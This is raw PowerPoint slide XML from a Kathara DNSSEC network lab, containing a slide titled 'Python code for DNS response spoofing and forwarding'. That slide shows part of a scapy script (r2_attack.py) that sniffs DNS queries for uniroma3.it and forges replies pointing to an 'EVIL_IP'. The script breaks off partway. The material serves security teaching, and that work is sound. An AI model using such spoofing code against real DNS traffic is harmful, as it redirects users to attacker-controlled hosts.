                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stopped</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> by user.")</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9D10810-244D-0D88-BF75-22805EBC6B81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/r2/r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19587BB1-04AD-583D-B0F7-08857289C838}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533524" y="116632"/>
            <a:ext cx="10048875" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDB7D506-178A-F720-E0E2-82190CB9EF28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C071F1-41E6-2768-3C14-67A6EA150EA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21096316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568374-3140-3FD3-D72B-D5FE05EFA347}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B67492-D65A-D9F3-AF4E-BD4AB339F3D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F414F52-6D0B-92F5-2A9E-A6AF517544C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>scapy.all</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> import DNSQR , DNS , IP , UDP , DNSRR , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>send</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ,sniff , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sendp</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>EVIL_IP = "210.0.3.50"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DNS_UNI_IP = "110.0.0.10"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>INTERFACE = "eth0"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>TARGET_DOMAIN = "uniroma3.it"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>def</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>):</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt.haslayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(DNSQR) and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == 0 and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == DNS_UNI_IP:        </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNSQR].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname.decode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> TARGET_DOMAIN in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ether_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
